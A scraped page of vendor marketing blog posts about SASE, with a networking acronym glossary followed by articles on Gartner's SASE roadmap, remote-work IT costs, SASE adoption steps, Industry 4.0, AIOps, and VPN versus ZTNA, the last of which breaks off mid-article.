A Point of Presence (PoP) is an access point to a network, such as a SASE or SD-WAN appliance. Traffic can enter and exit these networks via a PoP. According to Gartner, many emerging edge applications require “a cloud-delivery-based approach, favoring providers with many points of presence (POPs).”
Source: Market Trends: How to Win as WAN Edge and Security Converge Into the Secure Access Service Edge, 29 July 2019, Joe Skorupa, Neil MacDonald
Virtual Private Network (VPN) solutions provide an encrypted link between a network and a remote user or network. Traffic sent over the VPN acts as if the remote device is directly connected to the network with full access to corporate resources. Enterprises that have traditionally relied on VPN are realizing that it’s poorly suited for the shift to the cloud and work-from-anywhere reality, as it lacks granular security, global scalability and performance optimization capabilities.
Unified Communications (UC) is the integration of corporate communications services, such as voice, messaging, videoconferencing, etc. UC creates a consistent user interface and experience across multiple communications media but requires a high-performance, reliable, and geographically distributed network.
Unified Communications as a Service (UCaaS) is a cloud-based delivery model for UC. With SASE, UCaaS traffic is optimally routed to the UCaaS provider instance, and UC/UCaaS components connected to a SASE Cloud are protected against network attacks without requiring additional security solutions.
Quality of Experience (QoE) measures how network performance impacts the end user. QoE takes into account the fact that some performance issues may have a negligible impact on application performance while others render an application unusable. For example, SASE provides a higher QoE than VPN for cloud-based applications by eliminating the need to backhaul traffic through the enterprise network.
Policy-based Routing (PbR) routes network flows based on policies defined by a network administrator. It can provide priority to certain types of traffic or allow it to use more expensive routes, such as MPLS circuits. SD-WAN and SASE solutions offer PbR functionality.
5th generation mobile networks are the most recent generation of cellular networks. They offer higher speeds and support higher densities of devices than previous generations. SD-WAN and SASE solutions often connect to 5G networks to provide increased resiliency.
Artificial intelligence for IT operations (AIOps) uses machine learning and big data to improve IT operations. AIOps enables automated data processing, decision-making, and response for IT operations. A SASE architecture enables businesses to realize the full potential of AIOps, allowing IT to focus on valuable business objectives such as user experience, revenue, and growth.
Voice over IP (VoIP) enables voice communications over broadband Internet. Telephony data is encoded in network packets and sent over the Internet to its destination rather than traditional phone networks. Like UC solutions, VoIP requires high-performance, reliable, and geographically distributed networks.
Content Delivery Network (CDN) is a geographically distributed network of servers that serve cached copies of web content. CDNs improve a website’s performance by moving the service closer to end users and decreasing the load on the origin server.
Network as a Service (NaaS) is a delivery model for cloud-based networking services. With NaaS, a company can deploy and manage its own networks using infrastructure maintained by its service provider. SASE is an example of a NaaS offering because SASE PoPs provide all required network services in a cloud-based appliance.
Internet Service Providers (ISP) provide their customers with access to the Internet. In addition to Internet access, ISPs may also offer other services, such as email, web hosting, and domain registration.
Universal Customer Premises Equipment (uCPE) is a general-purpose off-the-shelf server, including compute, storage, and networking. uCPEs provide network and security services using network function virtualization.
Network Function Virtualization (NFV) provides network functions using virtualized services rather than dedicated appliances. This enables these functions to be provided using uCPEs or cloud platforms rather than expensive, dedicated infrastructure.
Virtual Network Functions (VNF) are virtualized network services that replace dedicated hardware appliances. VNFs can be linked together using service chaining to create more complex functionality. The use of VNFs and service chaining is common among providers of SASE alternatives that lack the required service convergence of SASE.
Software-Defined Networks (SDN) decouple the control plane from the forwarding plane. The network is defined and managed in software, making it more flexible and adaptable. SD-WAN and SASE are examples of SDN applied to the corporate WAN.
Local Area Networks (LAN) link computers together within an organization. A LAN is connected to the Internet via one or more ISPs.
The Border Gateway Protocol (BGP) is a protocol for exchanging routing information between different
autonomous systems (ASes) on the Internet. Each AS advertises which IP addresses it can route traffic to, helping traffic move from its source AS to the AS closest to its destination.
The Open Shortest Path First (OSPF) protocol is designed to route traffic within an AS. It uses Dijkstra’s algorithm to find the shortest route to its destination, minimizing the distance that the traffic needs to travel and hopefully the latency as well.
The Domain Name Service (DNS ) is the “address book” of the Internet. DNS servers translate domain names (like catonetworks.com) to the IP addresses used by computers to route traffic.
While these are some of the most common and important acronyms in networking, this is far from a complete list. To learn more about how modern networks work, read more on the Cato Networks blog.
Understanding the 2021 Strategic Roadmap for SASE Convergence In July 2019, Gartner coined the term Secure Access Service Edge (SASE) to define the next generation of network security technology. SASE solutions acknowledge that modern networks and security challenges are very different from the past. By integrating core security capabilities into a single service and moving...
The 2021 Strategic Roadmap for SASE Convergence Understanding the 2021 Strategic Roadmap for SASE Convergence
In July 2019, Gartner coined the term Secure Access Service Edge (SASE) to define the next generation of network security technology. SASE solutions acknowledge that modern networks and security challenges are very different from the past. By integrating core security capabilities into a single service and moving them to the cloud, SASE meets the needs of the modern digital business.
In March, Gartner published this year’s 2021 strategic roadmap for SASE convergence, which details how organizations can transition from legacy security architectures to fully integrated SASE deployments. I highly recommend that you check out the report for yourself as it provides a clear and compelling vision for organizations looking to start or continue their journey to SASE.
[boxlink link="https://www.catonetworks.com/resources/cato-sase-cloud-the-future-sase-today-and-tomorrow/?utm_source=blog&utm_medium=top_cta&utm_campaign=Cato_SASE_Cloud"] Cato SASE Cloud: The Future SASE – Today and Tomorrow | eBook [/boxlink]
Architectural Transformation is Driving SASE Forward
Gartner’s claim that SASE is “the future of network security” is based on the fact that corporate networks and infrastructures are evolving and legacy security solutions are not keeping up. In the past, companies could rely on a patchwork of perimeter-based security solutions to protect corporate assets located in on-premises data centers against attack.
The modern enterprise has moved many or all of its IT assets to the cloud to take advantage of the increased flexibility and scalability that it provides. As the traditional network perimeter dissolves and organizations move more quickly, security must become software-defined and cloud-delivered to effectively protect organizations against evolving threats.
Attempting to protect the modern enterprise with a legacy security architecture is unscalable and inefficient. The average organization has dozens of standalone security solutions to configure, monitor, and maintain, often with lean security teams. As a result, many organizations struggle to secure their existing infrastructure let alone securely adapt to changing requirements, such as the adoption of work from home or hybrid work models as a result of the COVID-19 pandemic.
As organizations' infrastructure and business needs evolve, they require modern SASE Architecture to meet their security requirements. Some of the main SASE Benefits to the modern enterprise include:
Solution Integration: SASE includes a full network security stack.
Cloud-Native Security: SASE is hosted in the cloud, making it well suited to securing distributed organizations and cloud-hosted applications.
Flexibility: As a cloud-native solution, SASE offers greater scalability and lower cost than appliance-based solutions.
Network Optimization: SASE solutions include SD-WAN network optimization over encrypted links between SASE PoPs (points of presence).
Short Term Solutions and Recommended Deployment of SASE
The goal of Gartner’s strategic roadmap for SASE adoption is to help enterprises make the move from legacy security architectures to SASE. In many cases, existing commitments and limited resources make it impossible for these organizations to make the jump all at once. Gartner breaks the process into manageable steps to help organizations work through the process.
Gartner defines a number of short-term goals for organizations making the move to SASE. These goals include:
Deploying Zero Trust Network Access (ZTNA): With the rapid growth of remote work, replacing legacy virtual private networks (VPNs) for remote users is a major priority. The ZTNA capabilities of SASE make it a more secure alternative to legacy remote access solutions that allows organizations to implement their zero trust strategies to better protect their data and users.
Creating a Phase-Out Plan: Gartner recommends performing a complete equipment and contract inventory and developing a timeline for phasing out on-premises perimeter and branch security appliances. These solutions can then be replaced with SASE capabilities hosted in the cloud.
Consolidating Vendors: SASE offers complete integration of a wide range of security capabilities, eliminating the need for standalone solutions from multiple vendors. Making the switch to SASE simplifies and streamlines every aspect of security from solution acquisition to long-term monitoring and maintenance.
Performing Branch Transformation: Security appliances deployed at each physical location creates a complex and sprawling security architecture. Working to move these solutions to the cloud centralizes and simplifies an organization’s security.
In addition to these short-term goals, Gartner also outlines a number of long-term goals that an organization should pursue. These largely focus on taking advantage of the security integration and ZTNA capabilities of SASE to centralize and streamline security operations across the enterprise.
Achieving even these short-term goals can be a significant milestone for an organization. Most companies will need to develop a multi-year strategy for making the move to SASE. While this strategy will differ from one company to another, Gartner makes one recommendation that applies across the board: start the process today. To learn more about how to start your transition to SASE, don’t hesitate to contact us or request a demo today.
The COVID-19 pandemic only served to accelerate the growing shift to work from anywhere. Due to the forced, but positive, experiment with remote work, many enterprises plan to continue supporting remote work indefinitely. However, the shift to remote work occurred suddenly, catching many enterprises unprepared. In Cato’s recent WFA Survey, 78% of IT professionals were...
Work from Anywhere Survey Finds Dramatic Increase in IT Cost The COVID-19 pandemic only served to accelerate the growing shift to work from anywhere. Due to the forced, but positive, experiment with remote work, many enterprises plan to continue supporting remote work indefinitely.
However, the shift to remote work occurred suddenly, catching many enterprises unprepared. In Cato’s recent WFA Survey, 78% of IT professionals were found to be spending more time supporting the remote workforce since the pandemic outbreak. 47% of participants experienced an increase of at least 25%, and 16% of participants suffered from an increase of over 50%.
[boxlink link="https://www.catonetworks.com/resources/the-future-of-enterprise-networking-and-security-2021-survey/?utm_source=blog&utm_medium=upper_cta&utm_campaign=survey_report?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass_4"] Get the 2021 Networking Survey Report[/boxlink]
Continued IT Challenges
The rapid transition to remote work created a scramble as enterprises tried to suddenly set up remote workforces. And, over a year later, companies are still struggling to effectively support remote work.
One of the primary challenges for enterprises is effectively securing their remote workforce. Nearly half of the respondents say they can’t provide the same level of security to remote users as in the office. This leaves the enterprise vulnerable to phishing and other Internet-borne attacks.
A significant driver of this is the reliance on legacy solutions for secure remote access. Early in the pandemic, the limitations of virtual private networks (VPNs) became plain as a massive increase in remote workers overloaded existing infrastructure. In response, companies adopted workarounds that unfortunately sacrificed enterprise security for performance.
Working from home also has a significant impact on employee productivity. Issues with VPN infrastructure mean that remote users have unstable connections to the corporate network. Additionally, 30% of the respondents claim that application performance is worse when working remotely compared to working from the office. Without the necessary infrastructure to support them, remote workers are not able to perform at their full potential, which hurts the business and its bottom line.
How the Hybrid Working Model Impacts IT
Issues with network connectivity and application performance create additional work for corporate IT departments. The shift to work from anywhere means that support requests, and the time spent on addressing them, have increased dramatically.
The biggest issue faced by IT due to the shift to remote work is that employees no longer have stable, high-performance access to corporate resources. The complexity of addressing these problems has also grown by orders of magnitude. In the past, IT was responsible for ensuring that each branch location had reliable, high-speed access to corporate assets. Now, IT must provide the same guarantees to employees that could be working from anywhere.
The shift to the new hybrid working model has created significant costs for organizations. Poor network and application performance affects employee productivity. And, IT focused on addressing support tickets, lacks the time and resources for infrastructure upgrades and other tasks. Many enterprises have already experienced the increased costs associated with work from home, but may struggle to quantify it.
SASE Gives Enterprises Adaptability
The high costs of work from anywhere stem from the fact that companies are using legacy technologies to support their remote workers. Secure Access Service Edge (SASE) enables the distributed enterprise to achieve the security and performance it needs in a sustainable and scalable way.
SASE converges SD-WAN, network security, and Zero Trust Network Access (ZTNA) into a global, cloud-native service. It optimizes and secures application access for all users and locations. Enterprises that had already adopted SASE were prepared for the pandemic and are ready for the new work from anywhere reality. Employees could connect from anywhere and have their traffic optimally and securely routed to corporate resources.
More enterprises are adopting SASE, which is a positive indication that the industry is moving in the right direction, the SASE direction. In January 2021, 19% were actively planning for a SASE deployment in the next 12 months. Just six months later, this number has increased by more than 10%. In January 2021, only 27% were considering SASE, and six months later, over 40% indicated they were considering SASE.
Post-COVID, work from anywhere is here to stay. Contact us and request a demo to learn how to reduce costs and IT service requests and better support your distributed workforce.
Corporate environments are evolving quickly, and the recent shift towards remote and hybrid work models due to COVID-19 is just the most obvious example of this. The modern enterprise network looks very different from that of even ten years ago, and security is playing catch-up. Secure Access Service Edge (SASE) offers security designed for the...
5 Steps to Prepare for SASE Adoption Corporate environments are evolving quickly, and the recent shift towards remote and hybrid work models due to COVID-19 is just the most obvious example of this. The modern enterprise network looks very different from that of even ten years ago, and security is playing catch-up.
Secure Access Service Edge (SASE) offers security designed for the modern enterprise, including native support for remote work. SASE combines networking and security functions into a single cloud service. This combination not only improves the security of the network but makes it faster and more scalable as well.
In recent years, I’ve seen a surge of interest in SASE as organizations start looking for ways to upgrade their infrastructure to support their remote workforce and achieve their goals of implementing zero trust security. However, adopting SASE means that an organization needs to make major changes in how its network operates and is secured. Below are five steps to help you make your SASE adoption process as smooth and painless as possible.
[boxlink link="https://catonetworks.easywebinar.live/registration-86?utm_campaign=blog_CTA_From_VPN_to_ZTNA_to_SASE"] Join our webinar: The Evolution of Remote Access: From VPN to ZTNA to SASE [/boxlink]
#1. Know your Users and their Applications
When planning your SASE migration, it’s important to keep your users in mind. Every organization has a unique user base, and these users and their needs will determine the required configuration for SASE. If you don’t know how your IT environment is used on a daily basis, it is much harder to secure it.
One of the core benefits of SASE is its support for zero trust security, which requires access controls to be defined based upon business needs. Understanding the structure and use cases of your IT environment is essential for ensuring a smooth migration to SASE and building effective test plans to verify services post-cutover.
#2. Know your Security Policies and Regulatory Compliance Obligations
In recent years, the regulatory landscape has exploded. New laws like the EU’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) add further obligations and security requirements for organizations. When designing your SASE Architecture, it’s important to keep these regulations and corporate security policies in mind.
With the recent rise in remote work, it is essential to ensure that your SASE solution is properly set up to support a secure remote workforce. This includes configuring ZTNA/SDP to provide remote access to corporate resources while maintaining compliance with data protection regulations and corporate security policies.
#3. Prepare for the Unknown and Unexpected
The primary goal of SASE security is to simplify and streamline security by consolidating multiple functions into a single service. This enables security teams to have full visibility into their network architecture.
With this increased visibility comes the potential to discover previously unknown security issues within an organization’s IT environment. As you make the migration over to SASE, be prepared to investigate and remediate previously unknown issues, such as security breaches, poorly performing Internet circuits, shadow IT services, and unintentionally permitted traffic flows.
#4. Bring in the ‘A-Team’
A migration to SASE is a complete overhaul of an organization’s IT and security infrastructure. SASE replaces legacy security appliances with a cloud-based, fully-integrated solution. When making this transition, it is vital to engage all stakeholders in the process. This includes internal IT, external contractors, channel partners, MSPs, etc.
By bringing in all of these parties from the very beginning, an organization ensures a smoother transition to SASE. Stakeholders can identify and plan for use cases and business needs from the beginning rather than discovering them later in the process.
#5. Get Ready for Things to Get Better
After making the move, your organization will be able to take full advantage of the benefits of SASE. SASE optimizes both networking and security infrastructure, meaning that your environment will not only be more secure but more agile and efficient as well.
After migrating to SASE, IT will also be freed of the tedious and time consuming maintenance of disparate point solutions, freeing up their time to focus on core business needs.
The Road to SASE Starts Here
If you’re just starting out on your SASE journey, I recommend checking out SASE for Dummies book, which provides a solid grounding on SASE and its benefits to the organization. From there, you can pursue a SASE Expert Certification and build the skills that you will need to effectively implement SASE within your organization.
Digitalization, work-from-anywhere, and cloud computing have accelerated SASE offerings to address the need for secure and optimized access, anytime, anywhere, and on any device. In Gartner’s new report from March 25, Neil MacDonald, Nat Smith, Lawrence Orans, and Joe Skorupa provide invaluable insights with a clear message to enterprises: “SASE is a pragmatic and compelling model that...
New Gartner Report: 2021 Strategic Roadmap for SASE Convergence Digitalization, work-from-anywhere, and cloud computing have accelerated SASE offerings to address the need for secure and optimized access, anytime, anywhere, and on any device. In Gartner’s new report from March 25, Neil MacDonald, Nat Smith, Lawrence Orans, and Joe Skorupa provide invaluable insights with a clear message to enterprises: “SASE is a pragmatic and compelling model that can be partially or fully implemented today.” And, enterprises should build a strategy for replacing legacy point products with a converged SASE platform.
The migration to SASE will enable enterprises to successfully address the current and future networking and security challenges:
Shifting to cloud-delivered security to protect anywhere, anytime access to digital capabilities
Simplifying security management that has become complex due to multiple vendors, policies, and appliances
Reducing cost with MPLS replacement and SD-WAN alternative projects
Better utilizing resources and skills to overcome organizational silos and facilitate growth
Practical Advice to Follow
Gartner analyzes the gaps between the future and current state of SASE offerings, and provides a strategic roadmap, migration plan, and advice on SASE adoption over the next five years.
Short term recommendations:
Deploy ZTNA/SDP to replace legacy VPN for the remote workforce
Implement phase-out tactics for on-premises hardware in favor of SASE services
Reduce cost and complexity by leveraging converged offerings of SWGs, CASBs, and VPN
Initiate branch transformation projects to integrate cloud-based security services
Consolidate SASE offerings to a single vendor or two explicitly partnered vendors
Implement ZTNA/SDP for all users, at all locations
Prefer SASE offerings that allow you to control privacy and compliance related matters
Create a sassy team of networking and security experts responsible for secure access across all edges
Strategic Assumptions to Consider
The report brings new statistics and understandings of market trends, naturally accelerated by the global crisis.
By 2024, 30% of enterprises will adopt cloud-delivered SWG, CASB, ZTNA, and FWaaS from the same vendor, up from 5% in 2020
By 2025, 60% of enterprises will have explicit strategies and timelines for SASE adoption, up from 10% in 2020
By 2023, to deliver flexible, cost-effective scalable bandwidth, 30% of enterprises will have only Internet WAN connectivity, up from 15% in 2020.
The fourth industrial revolution – aka Industry 4.0 – represents the next phase of innovation in production processes. Industry 4.0 merges traditional systems with new digital technologies (IoT, AI, big data, AR, robotics, M2M, real-time analytics, and so on), facilitating automation, agility, and efficiency to create a world of smart manufacturing. In an Industry 4.0...
Industry 4.0 – Talking About a Revolution The fourth industrial revolution – aka Industry 4.0 – represents the next phase of innovation in production processes. Industry 4.0 merges traditional systems with new digital technologies (IoT, AI, big data, AR, robotics, M2M, real-time analytics, and so on), facilitating automation, agility, and efficiency to create a world of smart manufacturing.
In an Industry 4.0 world, supply chains are completely visible and workflows are fully automated. Factories, machines, products, and processes are all smart; all connected; and all sharing data to better serve today’s sophisticated customers. This revolution is basically the digital transformation of manufacturing, with clear benefits that include better security, reduced cost, customer satisfaction, competitive differentiation, and more.
Industry 4.0 was first introduced in 2011, so why all the buzz 10 years later?
You guessed right, it’s none other than COVID-19 accelerating the revolution. According to Gartner, by 2024, following the pandemic, over 30% of manufacturers driving Industry 4.0 programs, will change their business models compared to 10% before the pandemic. This is because manufacturers will come out of the crisis knowing they must adapt to a changed environment, with different user preferences, new processes, and flexible workplace models.
And the pressure is on you to manage and control this new
Are you in a Position to Join the Revolution?
Gartner advises manufacturers to take into account disruptions such COVID-19 and “overcome impending crises with the least possible damage, and to be better prepared for any kind of downturn or even cyclical crises in the future.” Yet with today’s legacy WAN architecture, following this advice is easier said than done, and overcoming unexpected challenges with the “least possible damage” sounds like mission impossible (minus Tom Cruise and the happy ending).
Gaining business value through the ability to converge the digital and physical environments is the essence of Industry 4.0. However, the potential of this revolution can’t be realized with an outdated, fragmented network infrastructure.
Current networks were never designed to support the fundamental requirements of security, flexibility, availability, and resiliency Industry 4.0 demands. Too many manufacturers are stranded with legacy MPLS-based networks, and IT has no effective way to gain visibility across systems, locations, processes, and users; and extracting actionable data becomes close to impossible. Perhaps this is one of the reasons why Gartner predicted that by 2021 only half of all Industry 4.0 transformation initiatives would be successful.
The Cost of Being Left Behind
Let’s examine one of the essential requirements for leveraging Industry 4.0 – continuous availability. According to ITIC’s recent report, 8 out of 10 enterprises require a minimum of 99.99% uptime for their mission critical systems; and 2 out of 10 enterprises request at least 99.999% availability. These expectations may seem high, but in the context of Industry 4.0, they’re necessary and justified.
The business damage from downtime affects enterprises of all sizes and verticals. In 2020, 98% of enterprises indicated that the hourly cost of downtime was more than $100K; and for 34%, the cost reached $1M! Considering the volume of processes and systems manufacturing includes, just one hour of downtime entails significant loss to the business.
Any trouble with your network could translate into damage to production, loss of data, and negative impact on your brand reputation.
As smart manufacturing continues to evolve, manufacturers must adapt to, and keep up with, changes (both predicted and unpredicted). From IT’s perspective, this calls for a network that enables them to seamlessly and securely support new technologies as they’re introduced, alongside ensuring constant connectivity to everyone, everywhere. Without this, IT won’t be able to support Industry 4.0 projects and manufacturers will find themselves out of the game.
A Smart Factory Calls for a SASE Network
To empower manufacturers to emerge stronger from the global crisis and deliver on the promise of Industry 4.0 – a new (and smart) network is needed. A network that provides the underlying mission critical infrastructure that can support Industry 4.0 technologies. Fortunately, this network already exists. It’s called Secure Access Service Edge (SASE) and is considered by Gartner to be transformational and the future of network security.
SASE converges SD-WAN and network security into a single cloud service, delivering a uniform set of security and optimization capabilities, connecting all users, equipment, and locations. A SASE platform is cloud-native and its service is delivered through a global private backbone, supported by numerous distributed PoPs.
With SASE, IT can eliminate MPLS, deliver optimized performance, maintain a strong security posture, ensure 99.999% availability, and natively support new digital technologies.
Global private backbone ensures IT can connect all enterprise resources over high-speed Internet without compromising on availability or network performance.
Enterprise-grade Security as a Service provides a consistent level of security across all edges, which is simple to manage even by small IT teams.
Built-in ZTNA/SDP guarantees employees continue working from remote without any compromise on performance and productivity; and even in crisis mode – business continues as usual.
Cloud-native integration helps migrate data and applications to the cloud with minimal risk and effort, while eliminating or avoiding the high cost of private cloud connections like Azure ExpressRoute or AWS Direct Connect.
A true SASE network will ensure you can respond better to business needs, deploy workplaces of any kind faster, and enable the Industry 4.0 transformation to support your modern global manufacturing business.
Pre or post COVID-19, the fourth industrial revolution touches upon enterprises of various types, sizes, and locations all sharing the same challenge: How to embrace new technologies that support both current and future needs, justifying their related investment. Manufacturers that succeed in leveraging the use of new technologies will be able to improve business operations, create new value, prevail the global crisis, and be ready for the unexpected; be ready for the new normal.
We’re in the midst of this revolution, and the question to be asked is not will your business be disrupted, but rather when will your business be disrupted, and how can you ensure your underlying network infrastructure is adequate to support the Industry 4.0 journey and create value for your company.
Gartner’s Predicts 2020: Resilience in Industrie 4.0 for Advanced Manufacturing Builds on Data and Collaboration Models, ID G00465232
ITIC 2020 Global Server Hardware, Server OS Reliability Survey
Note: This is the second post following AIOps and SASE – A Match Made in the Cloud. The introduction of SASE to the market is enabling enterprises to realize the potential of AIOps, bringing IT operations to a whole new level. Let’s recall the three qualities of AIOps Gartner defined: observe (gathering and monitoring data);...
Putting AIOps with SASE to Use Note: This is the second post following AIOps and SASE – A Match Made in the Cloud.
The introduction of SASE to the market is enabling enterprises to realize the potential of AIOps, bringing IT operations to a whole new level. Let’s recall the three qualities of AIOps Gartner defined: observe (gathering and monitoring data); engage (understanding and analyzing the data); act (automating actions and responding to problems). SASE improves all these qualities, creating use cases with a clear impact on the business. Here’s how:
1 – Observe Use Case: Intelligent Alerting
Technologies come and go, but data is here to stay. And the volume of data is only increasing, with alerts pouring down noisily on IT. IDC predicts that by 2025, data will grow by 61% reaching 175 zettabytes(!) of data worldwide. Now that’s a lot of data…
Even if IT uses AIOps techniques somehow, without the right network architecture, there’s no intelligent way to gather and monitor massive amounts of data. On top of the challenge of collecting and inspecting data, Computer Weekly recently discussed the struggle IT leaders have with the increasing volumes of alerts, where 99% claim that this is causing problems for their teams, and 83% admit their IT staff is suffering from alert fatigue.
Elad Menahem, our Director of Security, explains this well: “Security analysts face a daily flood of security alerts most of which are simply irrelevant. These false positives result in alert fatigue that leads security professionals to block access to legitimate business resources or simply disable their defenses, increasing the risk of infection.”
We all know the undesirable result of the boy who cried wolf. This is where AIOps with SASE can make a difference. A SASE vendor gathers and stores all data in a big data repository. With full visibility into the entire network, the SASE vendor then provides ongoing monitoring of all traffic, using AIOps to make sense of the data and alerting IT only when needed. Mostly, not alerting IT when it’s not needed. Intelligent alerting reduces alert fatigue and helps IT prioritize attention to what matters most.
2 – Engage Use Case: Root Cause Analysis
Gathering and monitoring data is just the beginning; IT also needs a way to analyze the data in order to find the root cause of a problem. In today’s complex, fragmented network environment, finding the root cause is complex accordingly. A problem can originate from a specific issue or device, or stem from several different events together, but there’s no effective way of uncovering the source within a fragmented architecture.
With SASE complexity goes away. IT can easily view past alerts in a focused context without any noise. Pinpointing problems becomes simple, quick, and accurate. In addition, real-time monitoring provides immediate visibility into the entire network, enabling IT to determine if a problem persists or not.
can also receive alerts together with an analysis, explaining why a specific conclusion was reached. This allows IT to further investigate the root cause of a problem and provide input in order to feed the AI/ML engine for optimizing detection and analysis capabilities moving forward.
3 – Act Use Case: Proactive Incident Detection
Intelligent alerting and root cause analysis facilitate accurate and effective response. AIOps with SASE delivers automated notifications to IT regarding incidents that need attention. Anomaly detection capabilities can alert IT of irregular, suspicious network behavior, so that IT is aware of any potential trouble. This accelerates remediation capabilities with a workflow process that’s already in place, calling for IT intervention only if and when needed.
AIOps with SASE enables IT to adopt a proactive approach to problem detection, adding optimization rules, fine-tuning alert thresholds, tightening security, and so on. Rather than merely reacting to incidents, IT can now predict problems even before they occur, ensuring seamless user experience and directing resources to core business initiatives.
Next Great Leap for IT
AIOps utilizes AI/ML to help IT manage networking and security effectively, in a way that truly supports the digital business. Enterprises that have already implemented SASE as their underlying network will be able to realize the full potential of AIOps, moving past the typical IT benchmarks of uptime and availability.
A SASE network supports a closed feedback loop, where IT can easily see the effectiveness of their actions, way before hearing about a problem from an annoyed end user. Guesstimating, hoping, and praying, are replaced with monitoring, understanding, and acting accordingly. AIOps with SASE empowers IT teams of the future to focus their efforts and skills around the most significant business metrics such as user satisfaction, revenue generation, and growth acceleration.
Imagine handling a vacation booking at The Venetian without the right hotel management software. It’s hard to even picture the time, effort and resources needed for basic actions like verifying a room’s availability, knowing when a room is clean for early check-in, granting guests independent access to hotel facilities without key cards, calculating the cost...
AIOps and SASE – A Match Made in the Cloud Imagine handling a vacation booking at The Venetian without the right hotel management software. It’s hard to even picture the time, effort and resources needed for basic actions like verifying a room’s availability, knowing when a room is clean for early check-in, granting guests independent access to hotel facilities without key cards, calculating the cost at check-out, etc.
Now picture an IT team equipped with legacy tools, trying to manually control an enterprise network in a multi-cloud environment, with physical datacenters, global branches, numerous employees working from everywhere and on any device, and huge volumes of data constantly being generated. Sounds out of control...
The analogy is clear: Just like The Venetian can’t be managed like a small inn from the previous century, today’s IT Operations (ITOps) can’t be effectively run with traditional tools designed for a different type of network, and different era. The needs of today’s digital business – especially with a global crisis in the background – call for some heavy-duty automation.
According to Gartner, the notion of ITOps becoming smarter and “independently” automated, is already here and available. And it’s called AIOps.
AIOps to the Rescue
The objective of Artificial Intelligence for ITOs (AIOps) is to empower IT to regain control of network and security in today’s complex, challenging environment via artificial intelligence (AI) and machine learning (ML) techniques that automate ITOps. AIOps continuously learns the patterns of an enterprise’s network, operations, and remediation actions, in order to expedite and improve processes, decision making and overall business performance.
The effect of AIOps is across the board, resulting in highly productive employees, happier customers, and better bottom line. Gartner defines Artificial Intelligence for IT operations (AIOps) as “the application of machine learning and data science to IT operations problems,” and predicts that exclusive use of AIOps for monitoring applications and infrastructure will rise from 5% in 2018 to 30% in 2023. In fact, according to Gartner “the long-term impact of AIOps on IT operations will be transformative.”
Transformative is a word with great significance. As is the word transformational used by Gartner to describe SASE. Is it merely a coincidence that today’s hottest subject – SASE, and AIOps, share the similar quality of being so impactful on the network and security industry? And what makes AIOps worthy of such a title? Let’s find out.
Transforming the Way IT Manages Enterprise Assets
When faced with network issues that need to be addressed, IT must identify what the problem is, but just as important, IT needs to understand how the problem can affect the business. Understanding this is crucial for moving from a reactive mode to a proactive mode.
With AIOps, the process of pinpointing and addressing a problem can be done on the spot, and many times even before the problem occurs. For example, preventing performance degradation or mitigating outages so that the customer experience isn’t affected. This is where AIOps brings ITOps to a whole new level.
How does this magic happen? Gartner defined three major qualities of AIOps:
Observe: Gathering and monitoring data.
Engage: Understanding and analyzing the data.
Act: Automating actions and responding to problems.
By analyzing the data from AI/ML based platforms, IT extracts accurate, actionable insights to automatically detect and respond to problems in real-time, and ahead of time. Analysis and decision-making are “offloaded” to an artificial brain that is able to process data, identify threats, make correlations, alert, and respond faster and more accurately than the manual brain.
AIOps with a SASE Twist
To truly deliver on the transformative promise of AIOps and reap the benefits, the right underlying infrastructure is needed. This means a transformational network infrastructure that enables visibility into all of the enterprise’s data, alongside the ability to deliver continuous insights across all IT platforms and tools.
Full network visibility is dependent on a converged, cloud-native architecture. And Gartner’s Secure Access Service Edge (SASE) is exactly that: the convergence of all networking functions and security into a unified cloud service, based on edge identity, combined with real-time context, and security policies.
Unfortunately, a network built on disparate point solutions with traditional technological silos can’t utilize AIOps to its full potential. In today’s complex network environment, a root cause of a problem can stem from various factors or a combination of some. It can be a problem in a specific branch, cloud datacenter or related to a service or an event; it can be a problem at the network level, application level or device-related. And, if AIOps is dependent of a fragmented infrastructure, finding, remediating, and preventing a problem becomes extremely challenging and significantly less effective.
The Great Responsibility that Comes with AIOps
On a personal note, and unlike a vendor offering boxes, we talk from experience when we say that delivering on the promise of AIOps comes with the great responsibility of having to act quickly and accurately without negatively affecting the customer.
Being the first true SASE vendor means that our infrastructure affects our many customers, and there’s no room for mistakes. This is why we built a global private backbone of 60+ PoPs, with self-healing capabilities that ensure ongoing, uninterrupted service. Our SASE platform enables us to implement the three requirements of Gartner for AIOps:
Gathering and monitoring data, stored in our big data repository (observe).
Applying AI and ML algorithms to understand and analyze the data and identify the root cause of a problem (engage).
Preventing and responding to problems automatically and accurately (act).
With SASE as the underlying network, customers benefit from AIOps without having to plan complicated strategies, make adjustments to their infrastructure, or hire AIOps experts.
AIOps presents a real boost to the modern digital business. We recognize this. Customers realize this. It’s exciting! But AIOps is too huge to cover in one blog post. Stay tuned for future posts, where we’ll share real stories, and explain the magic behind the SASE-based AIOps use cases.
Once Upon a VPN… In today’s challenging reality, remote access has become a basic requirement for businesses of all kinds, sizes, and locations. An enterprise’s ability to shift to a work-from-anywhere model instantly, securely, and at scale, will determine how it will weather the COVID-19 crisis. A common way to provide remote access is with...
SDP/ZTNA vs. VPN Once Upon a VPN...
In today’s challenging reality, remote access has become a basic requirement for businesses of all kinds, sizes, and locations. An enterprise’s ability to shift to a work-from-anywhere model instantly, securely, and at scale, will determine how it will weather the COVID-19 crisis.
A common way to provide remote access is with VPN; and enterprises naturally assumed they could extend their VPN solutions to keep up with evolving business needs, continuous security challenges, and the sudden explosion of remote users.
To find out if this assumption is true, let’s answer the following five questions:
1. Is VPN still relevant?
Over two decades ago VPN was the technology for providing secure remote access to the Internet. And at about the same time, the Motorola StarTAC was the mobile phone available in the market… So yes, while VPN was once the best remote access solution for the business, it no longer is.
The modern digital business of today works differently and requires a new approach to remote access. An approach that enables capabilities such as granular security, global scalability, and optimized performance. Yet, VPN fails to address these capabilities.
VPN doesn’t enable granular security policies. Instead, VPN provides users with a secure connection to the entire network, rather than to specific applications. This expands the attack surface and badly affects the enterprise’s security posture.
VPN was never designed with the purpose of delivering all users, at all locations, immediate and ongoing connectivity to enterprise applications. However, in a work-from-anywhere environment, this is exactly what’s needed; and VPN’s inability to support global scalability results in slow response time and negative impact on employee productivity.
Optimized performance isn’t supported by VPN as it relies on the unpredictable Internet. This means that for global access, IT needs to backhaul traffic to a VPN server in a datacenter and then to the cloud, adding latency to the VPN session and resulting in poor performance.
Simply put, if VPN doesn’t address the security, scalability, and performance needs of the business as it functions today, how relevant can VPN still be?
2. Can SDP address VPN’s limitations?
